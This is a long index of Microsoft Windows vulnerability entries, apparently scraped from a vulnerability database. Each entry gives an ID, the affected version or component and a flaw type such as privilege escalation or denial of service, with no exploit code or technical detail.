XMLDOM ActiveX Control privilege escalation [65723] Microsoft Windows Authenticode WinVerifyTrust privilege escalation [62913] Microsoft Windows up to XP SP3 Shell Numeric Error [61648] Microsoft Windows XP privilege escalation [60245] Microsoft Windows unknown vulnerability [60209] Microsoft Windows msvcrt.dll memory corruption [60065] Microsoft Windows 2000 mod_sql information disclosure [59391] Microsoft Windows memory corruption [59006] Microsoft Windows Media Center TV Pack memory corruption [59004] Microsoft Windows memory corruption [58991] Microsoft Windows XP memory corruption [58238] Microsoft Windows Data Access Components memory corruption [58236] Microsoft Windows TCP/IP Stack denial of service [57812] Microsoft Windows XP lots-of-polys-example.html privilege escalation [57692] Microsoft Windows XP denial of service [57085] Microsoft Windows msgsc.dll memory corruption [57080] Microsoft Windows privilege escalation [57014] Microsoft Windows Default Configuration [56779] Microsoft Windows Stream Buffer Engine SBE.dll privilege escalation [56598] Microsoft Windows Azure Sdk up to 1.2 privilege escalation [56383] Microsoft Windows privilege escalation [56176] Microsoft Windows 7/Server 2003/XP fxscover.exe CDrawPoly::Serialize memory corruption [55937] Microsoft Windows XP denial of service [55777] Microsoft Windows Movie Maker 2.6 memory corruption [55776] Microsoft Windows memory corruption [55775] Microsoft Windows Media Encoder 9 memory corruption [54982] Microsoft Windows 7/Vista SP2 denial of service [54981] Microsoft Windows R2 privilege escalation [54718] Microsoft Windows up to XP SP3 Print Spooler EmeraldThread privilege escalation [54717] Microsoft Windows privilege escalation [54555] Microsoft Windows 6.00.2900.5512 wab.exe memory corruption [54553] Microsoft Windows sdclt.exe weak encryption [54552] Microsoft Windows smmscrpt.dll memory corruption [54551] Microsoft Windows contact memory corruption [54342] Microsoft Windows privilege escalation [54341] Microsoft Windows Movie Maker 2.1 privilege escalation [54334] Microsoft Windows privilege escalation [54333] Microsoft Windows denial of service [54332] Microsoft Windows privilege escalation [53591] Microsoft Windows Server 2003 GetServerName cross site scripting [53511] Microsoft Windows privilege escalation [53207] Microsoft Windows Graphics Driver cdd.dll Numeric Error [53104] Microsoft Windows smtpsvc.dll privilege escalation [53103] Microsoft Windows smtpsvc.dll weak encryption [52780] Microsoft Windows cabview.dll privilege escalation [52776] Microsoft Windows SMB Client denial of service [52775] Microsoft Windows denial of service [52774] Microsoft Windows SMB Client privilege escalation [52753] Microsoft Windows information disclosure [52336] Microsoft Windows denial of service [52283] Microsoft Windows Media Player 11.0.5721.5145 memory corruption [52036] Microsoft Windows 2000 MsgBox memory corruption [51997] Microsoft Windows Media Player 9 memory corruption [51811] Microsoft Windows max3activex.dll privilege escalation [51809] Microsoft Windows denial of service [51808] Microsoft Windows privilege escalation [51807] Microsoft Windows privilege escalation [51806] Microsoft Windows privilege escalation [51804] Microsoft Windows weak encryption [51803] Microsoft Windows denial of service [51796] Microsoft Windows privilege escalation [51795] Microsoft Windows race condition [51794] Microsoft Windows privilege escalation [51793] Microsoft Windows race condition [51497] Microsoft Windows Live Messenger 2009 ActiveX Control msnmsgr.exe denial of service [51135] Microsoft Windows ir32_32.dll memory corruption [51134] Microsoft Windows privilege escalation [51133] Microsoft Windows 2000 SP4/Server 2003 SP2/SP3/XP SP2 privilege escalation [51132] Microsoft Windows memory corruption [51128] Microsoft Windows privilege escalation [51078] Microsoft Windows denial of service [51077] Microsoft Windows privilege escalation [51076] Microsoft Windows denial of service [51075] Microsoft Windows privilege escalation [51073] Microsoft Windows weak authentication [50811] Microsoft Windows denial of service [50786] Microsoft Windows 2000 llssrv.exe memory corruption [50785] Microsoft Windows privilege escalation [50783] Microsoft Windows privilege escalation [50451] Microsoft Windows GDI+ Numeric Error [50449] Microsoft Windows EducatedScholar privilege escalation [50448] Microsoft Windows privilege escalation [50447] Microsoft Windows privilege escalation [50446] Microsoft Windows Media Player 6.4 memory corruption [50445] Microsoft Windows EducatedScholar denial of service [50444] Microsoft Windows Local Security Authority Subsystem Service Numeric Error [50439] Microsoft Windows Numeric Error [50438] Microsoft Windows weak encryption [50431] Microsoft Windows privilege escalation [50430] Microsoft Windows privilege escalation [50429] Microsoft Windows privilege escalation [49866] Microsoft Windows Server 2003 privilege escalation [49745] Microsoft Windows Server 2003 denial of service [49434] Microsoft Windows 7 denial of service [49394] Microsoft Windows Server 2003 privilege escalation [49393] Microsoft Windows privilege escalation [49392] Microsoft Windows memory corruption [49391] Microsoft Windows Avifil32.dll Numeric Error [49046] Microsoft Windows Server 2003 quartz.dll privilege escalation [49045] Microsoft Windows Server 2003 quartz.dll privilege escalation [48894] Microsoft Windows Server 2003 msvidctl.dll privilege escalation [48517] Microsoft Windows 2000 denial of service [48516] Microsoft Windows Server 2008 privilege escalation [48513] Microsoft Windows Search 4.0 cross site scripting [48512] Microsoft Windows Server 2008 privilege escalation [48033] Microsoft Windows XP denial of service [47804] Microsoft Windows Media Player 11.0.5721.5260 Numeric Error [47719] Microsoft Windows 2000 memory corruption [47717] Microsoft Windows privilege escalation [47715] Microsoft Windows 2000 Wordpad memory corruption [47465] Microsoft Windows GDI+ gdiplus.dll GpFont::SetData Numeric Error [47464] Microsoft Windows unlzh.c memory corruption [47091] Microsoft Windows Server 2008 privilege escalation [47090] Microsoft Windows Server 2008 privilege escalation [47089] Microsoft Windows weak authentication [46637] Microsoft Windows DNS Server denial of service [46620] Microsoft Windows Live Messenger 2009 msnmsgr.exe privilege escalation [46007] Microsoft Windows Mobile 6.0 FTP Service directory traversal [45911] Microsoft Windows Domain Controller privilege escalation [45907] Microsoft Windows XP chm memory corruption [45905] Microsoft Windows privilege escalation [45904] Microsoft Windows memory corruption [45763] Microsoft Windows Live Messenger up to 8.5.1 information disclosure [45676] Microsoft Windows Media Player 9 quartz.dll Numeric Error [45381] Microsoft Windows Server 2008/Vista SP1 Explorer denial of service [45380] Microsoft Windows Server 2008/Vista SP1 Search denial of service [45378] Microsoft Windows Media Player up to 6.4 information disclosure [45377] Microsoft Windows Media Format Runtime up to 9.5 privilege escalation [45197] Microsoft Windows 2000 nskey.dll memory corruption [45129] Microsoft Windows Live Messenger denial of service [45063] Microsoft Windows Server 2003 Active Directory information disclosure [44860] Microsoft Windows Media Player up to 9 privilege escalation [44533] Microsoft Windows 2000 mqsvc.exe privilege escalation [44249] Microsoft Windows XP SP3 gdiplus.dll Numeric Error [44246] Microsoft Windows XP SP3 denial of service [44227] Microsoft Windows Mobile 6.0 Bluetooth privilege escalation [44069] Microsoft Windows denial of service [43982] Microsoft Windows Image Acquisition Logger ActiveX Control privilege escalation [43953] Microsoft Windows ActiveX Control wmex.dll memory corruption [43676] Microsoft Windows 2000/Server 2003/Vista/XP privilege escalation [43675] Microsoft Windows 2000/Server 2003/Vista/XP of privilege escalation [43659] Microsoft Windows Messenger 5.1 ActiveX Control information disclosure [43658] Microsoft Windows XP SP2 nslookup.exe privilege escalation [43102] Microsoft Windows 2000 SP4/Server 2003 SP2/Server 2008 DNS unknown vulnerability [42732] Microsoft Windows Server 2003/Vista/XP privilege escalation [42731] Microsoft Windows Server 2003 privilege escalation [42638] Microsoft Windows Installer 3.1.4000.1823 ActiveX Control msiexec.exe memory corruption [42328] Microsoft Windows Live Onecare 1.1.3520.0 Malware Protection Engine mpengine.dll denial of service [42327] Microsoft Windows Live Onecare 1.1.3520.0 Malware Protection Engine mpengine.dll denial of service [41879] Microsoft Windows 2000/Server 2003/Vista memory corruption [41878] Microsoft Windows 2000/Server 2003/Vista weak authentication [41877] Microsoft Windows Server 2003 vbscript.dll privilege escalation [41656] Microsoft Windows privilege escalation [40987] Microsoft Windows 2000 privilege escalation [40986] Microsoft Windows Vista denial of service [40416] Microsoft Windows XP memory corruption [39937] Microsoft Windows Media Player 11 Numeric Error [39769] Microsoft Windows 2000 cryptgenrandom information disclosure [39749] Microsoft Windows 2000 msjet40.dll memory corruption [39655] Microsoft Windows Server 2003 Configuration [39324] Microsoft Windows Mobile 2005 SMS privilege escalation [39013] Microsoft Windows XP explorer.exe memory corruption [39012] Microsoft Windows Live Messenger up to 8.1 doc memory corruption [38999] Microsoft Windows Server 2003 explorer.exe denial of service [38962] Microsoft Windows Media Player 9 privilege escalation [38332] Microsoft Windows Gadgets memory corruption [38329] Microsoft Windows cross site scripting [38328] Microsoft Windows memory corruption [38326] Microsoft Windows 2000 attemptwrite Numeric Error [38272] Microsoft Windows Media Player 11 wmplayer.exe denial of service [38246] Microsoft Windows denial of service [37736] Microsoft Windows Vista unknown vulnerability [37526] Microsoft Windows 2000/Server 2003 denial of service [37251] Microsoft Windows 2000 memory corruption [37157] Microsoft Windows XP Graphics Device Interface gdiplus.dll denial of service [37093] Microsoft Windows Server 2003 Error Message unknown vulnerability [36515] Microsoft Windows 2000/Server 2003/XP memory corruption [36086] Microsoft Windows XP SP1 BMP Image Integer Coercion Error [36052] Microsoft Windows 2000 memory corruption [36002] Microsoft Windows 2000/XP denial of service [35900] Microsoft Windows up to Vista GDI memory corruption [35846] Microsoft Windows 2000/Server 2003 Default Configuration [35822] Microsoft Windows Proxy Server denial of service [35708] Microsoft Windows Vista Teredo Address privilege escalation [35707] Microsoft Windows Vista Meeting Space dfsr.exe unknown vulnerability [35706] Microsoft Windows Vista weak authentication [35705] Microsoft Windows Vista weak authentication [35704] Microsoft Windows Vista/XP ARP denial of service [35703] Microsoft Windows Vista LLTD Mapper denial of service [35702] Microsoft Windows Vista LLTD Responder weak authentication [35701] Microsoft Windows Vista LLTD Mapper weak authentication [35700] Microsoft Windows Vista LLTD Mapper weak authentication [35654] Microsoft Windows XP winmm.dll mmioread denial of service [35514] Microsoft Windows Explorer ole32.dll memory corruption [35206] Microsoft Windows Server 2003/XP denial of service [34994] Microsoft Windows 2000 OLE Dialog memory corruption [34967] Microsoft Windows Mobile 5.0 denial of service [34804] Microsoft Windows Mobile 5.0 memory corruption [34794] Microsoft Windows Vista Speech Recognition sapi.dll privilege escalation [34793] Microsoft Windows Mobile 5.0 denial of service [34690] Microsoft Windows Explorer 6.0.2900.2180 explorer.exe denial of service [34207] Microsoft Windows Mobile Pocket PC Bluetooth Stack unknown vulnerability [34206] Microsoft Windows Bluetooth Stack unknown vulnerability [34038] Microsoft Windows Event Viewer eventvwr.exe unknown vulnerability [33890] Microsoft Windows XP SP2 Explorer explorer.exe denial of service [33889] Microsoft Windows Media Player 10.00.00.4036 denial of service [33795] Microsoft Windows Media Player 6.4 memory corruption [33589] Microsoft Windows Live Messenger up to 8.0 denial of service [32899] Microsoft Windows Digital Rights Management drmstor.dll storelicense memory corruption [32694] Microsoft Windows 2000 privilege escalation [31797] Microsoft Windows File Viewer winhlp32.exe memory corruption [31736] Microsoft Windows XP gdiplus.dll denial of service [31521] Microsoft Windows NT 4.0/2000/XP IP Stack denial of service [31236] Microsoft Windows information disclosure [31133] Microsoft Windows Server 2003/XP explorer.exe memory corruption [31024] Microsoft Windows Live Messenger 8.0 memory corruption [30801] Microsoft Windows up to 2000 Connection Manager memory corruption [30799] Microsoft Windows 98/ME Rendering Engine polypolygon Numeric Error [30131] Microsoft Windows NT 4.0/XP/2000/Server 2003 Distributed Transaction Coordinator denial of service [29471] Microsoft Windows Help winhlp32.exe memory corruption [29383] Microsoft Windows XP unknown vulnerability [28987] Microsoft Windows NT 4.0/2000/Server 2003 Default Configuration denial of service [28452] Microsoft Windows 2000/Server 2003/XP unknown vulnerability [28254] Microsoft Windows 2000 Rendering Engine extescape denial of service [27519] Microsoft Windows Server 2003/XP mshtml.dll denial of service [27224] Microsoft Windows up to 1999 denial of service [27160] Microsoft Windows 2000/XP Rendering Engine gdi32.dll memory corruption [26923] Microsoft Windows XP Administrator Account unknown vulnerability [26618] Microsoft Windows 2000/XP Subsystem memory corruption [26535] Microsoft Windows Distributed Transaction Coordinator msdtcprx.dll ndrallocate privilege escalation [26534] Microsoft Windows denial of service [26523] Microsoft Windows 95/98/ME/NT 4.0 Terminal Service unknown vulnerability [26519] Microsoft Windows 95/98/ME/NT 4.0 Chart widechartomultibyte memory corruption [26517] Microsoft Windows 95/98/ME/NT 4.0 Certificates unknown vulnerability [26516] Microsoft Windows 95/98/ME/NT 4.0 Active Directory unknown vulnerability [26515] Microsoft Windows 95/98/ME/NT 4.0 Access Control List unknown vulnerability [25708] Microsoft Windows unknown vulnerability [25515] Microsoft Windows orun32.exe memory corruption [25513] Microsoft Windows XP Services for UNIX unknown vulnerability [25509] Microsoft Windows msasn1.dll memory corruption [25400] Microsoft Windows 98SE user32.dll denial of service [25399] Microsoft Windows XP denial of service [25256] Microsoft Windows XP denial of service [25185] Microsoft Windows Media Player ME unknown vulnerability [24907] Microsoft Windows 2000 TCP/IP Stack denial of service [24746] Microsoft Windows 2000/ME Explorer denial of service [24283] Microsoft Windows 2000/Server 2003/XP memory corruption [24252] Microsoft Windows 2000/NT memory corruption [23410] Microsoft Windows XP Utility Manager denial of service [22675] Microsoft Windows winhlp32.exe memory corruption [22602] Microsoft Windows 2000/NT BASE winhlp32.exe memory corruption [22560] Microsoft Windows Media Player 9.0 getiteminfobyatom unknown vulnerability [68403] Microsoft Windows up to Vista information disclosure [68239] Microsoft Windows up to Vista Kerberos KDC EsikmoRoll privilege escalation [68196] Microsoft Windows up to Vista TrueType Array Index denial of service [68195] Microsoft Windows 7/Server 2003/Server 2008/Vista Input Method Editor privilege escalation [68192] Microsoft Windows up to Vista Remote Desktop Protocol weak authentication [68190] Microsoft Windows up to Vista Audio Service privilege escalation [68189] Microsoft Windows Server 2003 SP2 TCP/IP Stack privilege escalation [68184] Microsoft Windows up to Vista privilege escalation [68183] Microsoft Windows up to Vista Schannel privilege escalation [68165] Microsoft Windows up to XP OLE Automation Array OleAut32.dll SafeArrayDimen privilege escalation [68045] Microsoft Windows up to Vista SP2 OLE privilege escalation [67827] Microsoft Windows up to Vista win32k.sys privilege escalation [67826] Microsoft Windows up to Vista TrueType Font win32k.sys privilege escalation [67822] Microsoft Windows up to Vista OLE Object Packager packager.dll privilege escalation [67806] Microsoft Windows up to Vista TrueType Font privilege escalation [67362] Microsoft Windows up to Server 2012 R2 Remote Procedure Call denial of service [67326] Microsoft Windows Media Center MCPlayer.dll CSyncBasePlayer denial of service [67030] Microsoft Windows up to Vista Certificates weak authentication [67018] Microsoft Windows Server 2008/Server 2012/Server 2012 R2 Service Bus denial of service [66987] Microsoft Windows up to Vista Journal Parser privilege escalation [22011] Microsoft Windows Server 2003 idirectplay4 API denial of service [21967] Microsoft Windows 2000/ME Media Player cross site scripting [21926] Microsoft Windows XP Help Center HelpCtr.exe unknown vulnerability [21899] Microsoft Windows Server 2003/XP Help/Support Center dvdupgrd.htm memory corruption [21876] Microsoft Windows 98/2000/Server 2003/XP H.323 memory corruption [21873] Microsoft Windows ME/XP/NT 4.0/2000/Server 2003 memory corruption [21751] Microsoft Windows Media Services 4.1 TCP/IP Packet denial of service [21548] Microsoft Windows Media Player 9/ME PNG Image memory corruption [21476] Microsoft Windows 2000 Message Queue Manager memory corruption [21448] Microsoft Windows up to 2000 SP3/XP Terminal Service msgina.dll denial of service [21095] Microsoft Windows up to 2000 SP3 SMTP Service denial of service [20978] Microsoft Windows Server 2003 Shell Link directory traversal [20961] Microsoft Windows up to 2000 SP4 Troubleshooter ActiveX Control Tshoot.ocx RunQuery2 memory corruption [20960] Microsoft Windows up to Server 2003 Authenticode privilege escalation [20815] Microsoft Windows Distributed Component Object Model Interface memory corruption [20770] Microsoft Windows Media Player 7/8 IFRAME Tag privilege escalation [20662] Microsoft Windows up to 2000 SP3 shell32.dll ShellExecute memory corruption [20485] Microsoft Windows NT 4.0/2000 Media Services nsiislog.dll memory corruption [20213] Microsoft Windows 2000 Script Engine for JScript JScript.dll JsArrayFunctionHeapSort Integer Coercion Error [20182] Microsoft Windows ME Help/Support Center cross site scripting [20108] Microsoft Windows NT 4.0/2000/XP Terminal Server memory corruption [19970] Microsoft Windows 2000 Active Directory privilege escalation [19759] Microsoft Windows XP ISAKMP Service denial of service [19719] Microsoft Windows up to 2000 SP2 DCOM Client information disclosure [19574] Microsoft Windows 2000/XP Log Size denial of service [19490] Microsoft Windows Media Player up to 7.1 MP3 File Name mplay32.exe memory corruption [19355] Microsoft Windows 2000 TCP Packet denial of service [19315] Microsoft Windows XP Internet Explorer 6.0 privilege escalation [19261] Microsoft Windows XP Shell memory corruption [19231] Microsoft Windows XP Domain Controller unknown vulnerability [19194] Microsoft Windows 98/NT 4.0 Certificate weak authentication [19105] Microsoft Windows 2000/XP PPTP Service memory corruption [19082] Microsoft Windows 2000 SP2 SNMP LAN Manager denial of service [19061] Microsoft Windows 98/ME/XP ZIP Archive privilege escalation [19054] Microsoft Windows 2000/XP RDP denial of service [19053] Microsoft Windows 2000/XP RDP weak encryption [19043] Microsoft Windows NT 4.0/2000/XP CHM File memory corruption [19042] Microsoft Windows NT 4.0/2000/XP HTML Help ActiveX Control hhctrl.ocx alink memory corruption [18814] Microsoft Windows 98/98SE/ME/XP Crypto API weak authentication [18810] Microsoft Windows up to XP Certificate Enrollment ActiveX Control unknown vulnerability [18782] Microsoft Windows XP Help/Support Center uplddrvinfo.htm File denial of service [18772] Microsoft Windows NT 4.0/2000 SMB memory corruption [18709] Microsoft Windows HTML Help ActiveX Control Winhlp32.exe memory corruption [18537] Microsoft Outlook 2002 Windows Media Player player.launchurl cross site scripting [18464] Microsoft Windows 2000 Terminal Server privilege escalation [18395] Microsoft Windows Media Player 7.1 information disclosure [18351] Microsoft Windows Media Player 6.4/7.1 WMA Media File privilege escalation [18325] Microsoft Windows Media Player 8.00.00.4477 WMF File privilege escalation [18276] Microsoft Windows 2000 LANMAN Service denial of service [18214] Microsoft Windows XP TCP SYN denial of service [18130] Microsoft Windows 2000 denial of service [17973] Microsoft Windows 2000 Shell memory corruption [17960] Microsoft Windows 2000/XP SMTP Service denial of service [17959] Microsoft Windows 2000 SMTP Service privilege escalation [17958] Microsoft Windows up to XP SNMP Agent Service memory corruption [17947] Microsoft Windows 2000 Telnet Server memory corruption [17946] Microsoft Windows 2000/NT Authorization weak authentication [17890] Microsoft Windows XP Remote Desktop Client weak encryption [17871] Microsoft Windows ME SSDP Service ssdpsrv.exe denial of service [17834] Microsoft Windows 2000 NTFS privilege escalation [17761] Microsoft Windows 98/98SE/ME/XP UPnP denial of service [17760] Microsoft Windows 98/98SE/ME/XP UPnP memory corruption [17728] Microsoft Windows 2000 IKE denial of service [17718] Microsoft Windows 2000/XP Network Address Translation weak authentication [17660] Microsoft Windows 98/98SE/ME/XP UPnP denial of service [17658] Microsoft Windows Media Player up to 7.1 ASF File memory corruption [17655] Microsoft Windows NT 4.0/2000 Terminal Server denial of service [17608] Microsoft Windows XP Help Center helpctr.exe memory corruption [17567] Microsoft Windows NT 4.0/2000 Terminal Server denial of service [17389] Microsoft Windows 2000 IrDA Driver memory corruption [17373] Microsoft Windows NT 4.0/2000 NNTP Service denial of service [17372] Microsoft Windows Media Player 6.4/7.0/7.1 NSC File memory corruption [17310] Microsoft Windows NT 4.0/2000 DNS Server weak authentication [17266] Microsoft Windows NT 4.0 LsaQueryInformationPolicy information disclosure [17147] Microsoft Windows 2000 SMTP Service privilege escalation [17099] Microsoft Windows 98/98SE ARP denial of service [17056] Microsoft Windows 2000 Telnet Service denial of service [17055] Microsoft Windows 2000 Telnet Domain User information disclosure [17054] Microsoft Windows 2000 Telnet Service denial of service [17053] Microsoft Windows 2000 Telnet Session denial of service [17051] Microsoft Windows NT 4.0/2000 Visual Studio RAD fp30reg.dll memory corruption [17049] Microsoft Windows 2000 Message Request denial of service [16826] Microsoft Windows Media Player 6.4/7.0 Shortcut privilege escalation [16825] Microsoft Windows Media Player 6.3/6.4/7.0 ASX File memory corruption [16824] Microsoft Windows 2000 Internet Printing ISAPI Extension msw3prt.dll memory corruption [16822] Microsoft Windows 2000 Kerberos denial of service [16706] Microsoft Windows Media Player 7 WMP ActiveX Control privilege escalation [16677] Microsoft Windows 98/2000 Java Applet denial of service [16600] Microsoft Windows 2000 Event Viewer memory corruption [16540] Microsoft Windows Media Player 7 Skin skin.wmz privilege escalation [16510] Microsoft Windows NT 4.0 PPTP Server denial of service [16457] Microsoft Windows NT 4.0 MTS Package Registry privilege escalation [16417] Microsoft Windows Media Services 4.0/4.1 Unicast Service denial of service [16381] Microsoft Windows 2000 RDP denial of service [16370] Microsoft Windows 2000/ME Web Extender Client privilege escalation [16305] Microsoft Windows NT 4.0 Terminal Server RegAPI.DLL memory corruption [16269] Microsoft Windows Media Player 6.4/7.0 ASX File memory corruption [16267] Microsoft Windows 2000 Telnet Service denial of service [16238] Microsoft Windows 95/98/98SE/NT 4.0 TCP Connection denial of service [16232] Microsoft Windows CE 3.0.9348 Initial Sequence Number weak authentication [16212] Microsoft Windows NT 4.0/2000 SMBnegprots Request denial of service [16191] Microsoft Windows 95/98/98SE/ME NMPI Listener denial of service [16190] Microsoft Windows 95/98/98SE/ME File/Print Sharing Service weak authentication [16140] Microsoft Windows Media Player 7 OCX Control denial of service [16098] Microsoft Windows NT 4.0 Cenroll ActiveX Control xenroll.dll denial of service [16055] Microsoft Windows 2000 System Monitor ActiveX Control memory corruption [16024] Microsoft Windows 95/98/98SE NetBIOS Client denial of service [15985] Microsoft Windows up to XP Office 2000 File riched20.dll privilege escalation [15980] Microsoft Windows Media Services 4.0/4.1 Unicast Service denial of service [15965] Microsoft Windows 2000 NTLM Authentication telnet.exe privilege escalation [15884] Microsoft Windows 95/98 IPX Packet denial of service [15805] Microsoft Windows 95/98/NT 4.0/2000 NetBIOS weak authentication [15802] Microsoft Windows NT 4.0/2000 NetBIOS Name Server denial of service [15726] Microsoft Windows 2000 Telnet Server denial of service [15725] Microsoft Windows 2000 Port denial of service [15722] Microsoft Windows 95/98/NT 4.0 ARP Table weak authentication [15644] Microsoft Windows NT 4.0 Remote Registry Request denial of service [15607] Microsoft Windows Media Services 4.0/4.1 Encoder Request denial of service [15593] Microsoft Windows 95/98/NT 4.0/2000 CIFS Computer Browser denial of service [15592] Microsoft Windows NT 4.0 CIFS Computer Browser denial of service [15575] Microsoft Windows 95/98/NT 4.0/2000 IP Fragmentation Jolt2 denial of service [15554] Microsoft Windows NT 4.0 Service Control Manager denial of service [15512] Microsoft Windows 95/98 NetBIOS denial of service [15475] Microsoft Windows NT 4.0/2000 cmd.exe memory corruption [15455] Microsoft Windows 98/XP/NT 4.0/2000 Domain Name Resolver weak authentication [15397] Microsoft Windows Media Rights Manager 4.0/4.1 denial of service [15341] Microsoft Windows Media Services 4.0/4.1 Handshake denial of service [15325] Microsoft Windows 2000 Share weak authentication [15188] Microsoft Windows NT 3.5/4.0 RSH Service Utility .rhosts privilege escalation [15177] Microsoft Windows NT 4.0/2000 Policy privilege escalation [15160] Microsoft Windows NT 4.0 SP2 Password Complexity passfilt.dll weak authentication [15147] Microsoft Windows NT 4.0 Netbt.sys denial of service [15142] Microsoft Windows NT 4.0 ICMP Subnet Mask denial of service [15140] Microsoft Windows NT 4.0 Routing Information Field denial of service [15135] Microsoft Windows 95 Remote Administration privilege escalation [15122] Microsoft Windows NT 4.0 SNMP Agent denial of service [15066] Microsoft Windows NT 4.0 Local Security Authority Subsystem LsaLookupSids privilege escalation [15065] Microsoft Windows NT 4.0 Keystream privilege escalation [15011] Microsoft Windows NT 4.0/2000 NTMail privilege escalation [15003] Microsoft Windows 95/98 Credential privilege escalation [14987] Microsoft Windows NT System Policy weak authentication [14986] Microsoft Windows 98/NT 4.0/2000 Wordpad memory corruption [14976] Microsoft Windows Media Player ActiveX Control File information disclosure [14974] Microsoft Windows 95/98 Network privilege escalation [14921] Microsoft Windows NT 4.0 LSA lsass.exe denial of service [14849] Microsoft Windows 98/NT 4.0 IP Source Routing privilege escalation [14848] Microsoft Windows NT 4.0 RASMAN Configuration [14800] Microsoft Windows NT 4.0 TCP Initial Sequence Number weak authentication [14778] Microsoft Windows 95/98 Telnet Client memory corruption [14767] Microsoft Windows NT 4.0 Terminal Server weak authentication [14740] Microsoft Windows NT 4.0 Messenger Service denial of service [14733] Microsoft Windows NT 4.0/2000 Local Security Authority Subsystem privilege escalation [14719] Microsoft Windows NT 4.0 IOCTL privilege escalation [14718] Microsoft Windows 95/98/NT 3.51/NT 4.0/2000 IGMP Header privilege escalation [14710] Microsoft Windows NT 4.0 Image Header privilege escalation [14709] Microsoft Windows NT 3.51/NT 4.0 RAS/PPTP denial of service [14697] Microsoft Windows NT 4.0 CSRSS Worker Thread denial of service [14669] Microsoft Windows NT 4.0 RRAS/RAS Client privilege escalation [14608] Microsoft Windows 95/98/NT 3.51/NT 4.0/2000 ARP Packet denial of service [14560] Microsoft Windows 95/98/NT 4.0 ICMP Redirect Message denial of service [14489] Microsoft Windows NT 4.0 SP4 NT Hash Value weak authentication [14487] Microsoft Windows 95/98 TCP/IP Chorus denial of service [14461] Microsoft Windows 98 Packet denial of service [14454] Microsoft Windows NT 4.0 Beta Share privilege escalation [14443] Microsoft Windows 95/98/NT 3.51/NT 4.0/2000 SMB Authentication weak authentication [14429] Microsoft Windows NT Registry Key Value privilege escalation [14428] Microsoft Windows NT Registry Key Permission privilege escalation [14423] Microsoft Windows 2000/NT PDC/BDC privilege escalation [14418] Microsoft Windows 2000/NT OS/2/POSIX Subsystem privilege escalation [14394] Microsoft Windows 2000/NT NT Alerter privilege escalation [14379] Microsoft Windows NT Registry Key privilege escalation [14378] Microsoft Windows NT 4.0/2000 User Group privilege escalation [14371] Microsoft Windows up to XP Log File Size unknown vulnerability [14370] Microsoft Windows up to XP Removable Media privilege escalation [14368] Microsoft Windows up to XP Logon Box Username information disclosure [14367] Microsoft Windows up to XP Eventlog privilege escalation [14366] Microsoft Windows up to XP Registry Key privilege escalation [14362] Microsoft Windows 95/98/ME/NT File System privilege escalation [14361] Microsoft Windows NT 4.0/2000 Relationship privilege escalation [14360] Microsoft Windows up to XP Registry privilege escalation [14359] Microsoft Windows up to XP Registry privilege escalation [14358] Microsoft Windows up to XP Registry Audit Policy privilege escalation [14356] Microsoft Windows up to XP File Audit Policy privilege escalation [14354] Microsoft Windows NT Password Filter PASSFILT.DLL weak authentication [14348] Microsoft Windows NT Directory privilege escalation [14311] Microsoft Windows NT Web Server information disclosure [14310] Microsoft Windows NT 4.0 Ressource Kit denial of service [14301] Microsoft Windows NT IP Fragmentation Data Processing Error [14298] Microsoft Windows NT 3.51/NT 4.0 WFTP Server Guest weak authentication [14238] Microsoft Windows 95/NT 4.0 TCP Packet weak authentication [14197] Microsoft Windows NT 4.0 WINS denial of service [14128] Microsoft Windows NT 3.51/NT 4.0 WINS Coke denial of service [14077] Microsoft Windows NT 4.0 SMB Logon denial of service [14076] Microsoft Windows 95/NT 4.0 IP Fragmentation Bonk denial of service [14042] Microsoft Windows NT 4.0 SNMP Agent snmp.exe denial of service [14041] Microsoft Windows 95/NT 4.0 TCP SYN Teardrop2 denial of service [14040] Microsoft Windows 95/NT 3.51/NT 4.0 TCP SYN Teardrop denial of service [14031] Microsoft Windows 95/NT 4.0 TCP SYN Country denial of service [13992] Microsoft Windows WINS denial of service [13940] Microsoft Windows up to NT 4.0 SP2 IP Fragmentation privilege escalation [13924] Microsoft Windows up to NT 4.0 NetBIOS WinNuke denial of service [13911] Microsoft Windows NT 4.0 DNS Server denial of service [13873] Microsoft Windows 4.0 SMB Mount denial of service [13871] Microsoft Windows NT 4.0 Winpopup denial of service [13834] Microsoft Windows NT 4.0/2000 Account Policy weak authentication [13833] Microsoft Windows NT 4.0 File Audit Policy privilege escalation [13832] Microsoft Windows NT 4.0 Audit Policy privilege escalation [13831] Microsoft Windows NT 4.0/2000 REG Files privilege escalation [13830] Microsoft Windows NT 4.0/2000 Registry privilege escalation [13828] Microsoft Windows NT 4.0/2000 Account Policy privilege escalation [13826] Microsoft Windows Traceroute privilege escalation [13824] Microsoft Windows 95/NT 4.0/2000 NetBIOS/SMB Share weak authentication [13823] Microsoft Windows 95 NetBIOS/SMB Share weak authentication [13821] Microsoft Windows NT 4.0/2000 IP Forwarding privilege escalation [13819] Microsoft Windows NT 4.0/2000 Password Authentication weak authentication [13817] Microsoft Windows NT 4.0/2000 SNMP Registry Key information disclosure [13815] Microsoft Windows 95/NT 4.0 ICMP Jolt denial of service [13814] Microsoft Windows NT 4.0 DNS Server denial of service [13802] Microsoft Windows 95/NT 3.51 Samba Share Code [13695] Microsoft Windows NT 4.0 TCP Sequence Number weak authentication [13549] Microsoft Windows 7/8/8.1/Server 2012 Remote Desktop Protocol weak encryption [13548] Microsoft Windows up to Vista TCP/IP Packet privilege escalation [13546] Microsoft Windows up to Vista XML Core Services privilege escalation [13544] Microsoft Windows up to Vista GDI+ privilege escalation [13543] Microsoft Windows up to Vista Unicode Script Processor usp10.dll memory corruption [13397] Microsoft Windows 2000/Server 2003/XP DHCP Response weak authentication [13234] Microsoft Windows iSCSI Packets privilege escalation [13233] Microsoft Windows iSCSI Packets privilege escalation [12853] Microsoft Windows up to XP SP3 Batch File CreateProcess privilege escalation [12711] Microsoft Windows Media Player 11.0.5721.5230 WAV File memory corruption [12530] Microsoft Windows Server 2003/Server 2008/Server 2012/Vista/XP Security Account Manager privilege escalation [12526] Microsoft Windows up to XP DirectShow denial of service [12264] Microsoft Windows up to XP XML Core Services privilege escalation [12263] Microsoft Windows up to Server 2012 Direct2D memory corruption [12238] Microsoft Windows 8/RT/Server 2012 IPv6 privilege escalation [11673] Microsoft Windows Live Movie Maker 2011 WAV File privilege escalation [11456] Microsoft Windows up to XP Scripting Runtime Object Library denial of service [11167] Microsoft Windows up to XP DirectAcccess Server privilege escalation [11150] Microsoft Windows 8/Server 2012 Hyper-V Data Structure Value privilege escalation [11147] Microsoft Windows up to XP X.509 Certificate Processor Crypt32.dll/Wcrypt32.dll privilege escalation [11145] Microsoft Windows up to XP Graphics Device Interface Numeric Error [11081] Microsoft Windows Server 2008/Vista TIFF Image 